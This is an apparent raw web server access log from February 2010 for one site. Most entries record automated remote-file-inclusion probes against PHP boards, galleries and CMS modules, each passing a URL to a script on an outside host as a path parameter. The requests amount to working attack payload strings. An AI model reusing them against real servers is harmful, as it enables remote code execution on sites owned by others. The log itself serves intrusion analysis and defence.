125.141.91.138 - - [15/Feb/2010:07:37:18 -0800] "GET /delete_all.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:07:37:22 -0800] "GET /logs/access_100203.log%20%20/delete_all.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:07:37:22 -0800] "GET /logs/delete_all.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:07:37:23 -0800] "GET /delete_all.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:07:37:52 -0800] "GET /write_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:07:37:52 -0800] "GET /logs/access.log//write_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:07:37:52 -0800] "GET /logs//write_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.179.6 - - [15/Feb/2010:07:38:21 -0800] "GET /logs/access_100116.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://bk.knu.ac.kr/en/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.245.1 - - [15/Feb/2010:07:38:31 -0800] "GET /logs/access_100105.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.179.6 - - [15/Feb/2010:07:38:48 -0800] "GET /logs/access_100113.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://bk.knu.ac.kr/en/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:38:52 -0800] "GET /logs/access_100114.log//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:38:53 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:38:53 -0800] "GET /logs/access_100114.log//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:38:53 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:38:54 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
77.79.245.1 - - [15/Feb/2010:07:39:13 -0800] "GET /logs/access_100116.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:07:39:22 -0800] "GET /logs/access_100119.log//write_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:39:28 -0800] "GET /logs/access_100201.log//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [15/Feb/2010:07:39:30 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
210.127.209.105 - - [15/Feb/2010:07:39:30 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
210.127.209.105 - - [15/Feb/2010:07:39:30 -0800] "GET /logs/access_100103.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:39:34 -0800] "GET /logs/access_100114.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:39:35 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:39:35 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:39:37 -0800] "GET /logs/access_100114.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:39:37 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:39:37 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:07:39:39 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:07:39:39 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:07:39:39 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:07:39:39 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:07:39:39 -0800] "GET /logs/access_100114.log//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:07:39:39 -0800] "GET /logs/access_100114.log//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:07:39:51 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:07:39:51 -0800] "GET /logs/access_100114.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:07:39:51 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:40:02 -0800] "GET /logs/access_100114.log//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:40:02 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:40:02 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:07:40:03 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:07:40:03 -0800] "GET /logs/access_100114.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:07:40:04 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
77.79.245.1 - - [15/Feb/2010:07:40:06 -0800] "GET /logs/access_100105.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:40:08 -0800] "GET /logs/access_100201.log//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:40:08 -0800] "GET /logs/access_100114.log//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:40:08 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:40:08 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:07:40:13 -0800] "GET /logs/access_100201.log//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:07:40:22 -0800] "GET /logs/access_100201.log//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [15/Feb/2010:07:40:25 -0800] "GET /logs/access_100201.log//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:40:27 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.0" 200 4935 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:40:27 -0800] "GET /logs/access_100114.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:40:27 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [15/Feb/2010:07:40:32 -0800] "GET /logs/access_100114.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [15/Feb/2010:07:40:32 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [15/Feb/2010:07:40:32 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [15/Feb/2010:07:40:32 -0800] "GET /logs/access_100114.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [15/Feb/2010:07:40:32 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [15/Feb/2010:07:40:32 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:40:39 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:40:39 -0800] "GET /logs/access_100114.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:40:39 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [15/Feb/2010:07:42:05 -0800] "GET /logs/access_100125.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
210.127.209.105 - - [15/Feb/2010:07:42:06 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
210.127.209.105 - - [15/Feb/2010:07:42:06 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
119.63.198.49 - - [15/Feb/2010:07:42:43 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "puaga.com"
210.127.209.105 - - [15/Feb/2010:07:43:17 -0800] "GET /logs/access_100112.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:07:43:27 -0800] "GET /delete_all.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:07:43:28 -0800] "GET /logs/delete_all.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:07:43:28 -0800] "GET /logs/access_100203.log/delete_all.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.61.181.34 - - [15/Feb/2010:07:43:48 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.61.181.34 - - [15/Feb/2010:07:43:48 -0800] "GET /logs/access_100120.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.61.181.34 - - [15/Feb/2010:07:43:48 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.58.171.88 - - [15/Feb/2010:07:44:02 -0800] "GET /logs/access_100114.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.iseulbi.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:07:44:02 -0800] "GET /delete_all.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:07:44:02 -0800] "GET /logs/access_100203.log/delete_all.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:07:44:02 -0800] "GET /logs/delete_all.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.58.171.88 - - [15/Feb/2010:07:44:07 -0800] "GET /logs/access_100117.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.iseulbi.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:07:44:10 -0800] "GET /write_comment_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:07:44:25 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:07:44:25 -0800] "GET /logs/access_100210.log%20%20//write_comment_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:07:44:27 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:07:44:27 -0800] "GET /logs/access_100210.log%20%20//write_comment_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:07:44:27 -0800] "GET /write_comment_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:07:44:30 -0800] "GET /logs/access_100202.log%20%20//write_comment_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [15/Feb/2010:07:44:34 -0800] "GET /logs/access_100112.log//modules/agendax/addevent.inc.php?agendax_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
210.127.209.105 - - [15/Feb/2010:07:44:34 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
210.127.209.105 - - [15/Feb/2010:07:44:34 -0800] "GET /modules/agendax/addevent.inc.php?agendax_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
173.165.1.69 - - [15/Feb/2010:07:44:36 -0800] "GET /logs/access_100202.log%20%20//write_comment_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [15/Feb/2010:07:44:40 -0800] "GET /logs/access_100104.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
210.127.209.105 - - [15/Feb/2010:07:44:40 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
210.127.209.105 - - [15/Feb/2010:07:44:42 -0800] "GET /logs/access_100107.log//modules/agendax/addevent.inc.php?agendax_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
188.61.181.34 - - [15/Feb/2010:07:44:48 -0800] "GET /logs/access_100118.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:07:45:17 -0800] "GET /logs/access_100112.log%20%20//skin/uks_gallery_v3010/write.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:07:45:17 -0800] "GET /logs//skin/uks_gallery_v3010/write.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:07:45:17 -0800] "GET /skin/uks_gallery_v3010/write.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:07:45:32 -0800] "GET /skin/uks_gallery_v3010/write.php?dir=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:07:45:32 -0800] "GET /logs//skin/uks_gallery_v3010/write.php?dir=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:07:45:32 -0800] "GET /logs/access_100112.log%20%20//skin/uks_gallery_v3010/write.php?dir=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:07:45:37 -0800] "GET /logs//skin/uks_gallery_v3010/write.php?dir=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:07:45:37 -0800] "GET /logs/access_100112.log%20%20//skin/uks_gallery_v3010/write.php?dir=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:07:45:37 -0800] "GET /skin/uks_gallery_v3010/write.php?dir=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:46:37 -0800] "GET /logs/access_100130.log%20%20///index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:46:38 -0800] "GET /logs///index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:46:38 -0800] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [15/Feb/2010:07:46:52 -0800] "GET /logs/access_100111.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:47:21 -0800] "GET /logs/access_100130.log%20%20///index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:47:21 -0800] "GET /logs///index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:47:22 -0800] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [15/Feb/2010:07:47:25 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.solutionexchange-un.net.in/en//media/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:07:47:37 -0800] "GET /logs/access_100210.log//write_comment_update.php?board_skin_path=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
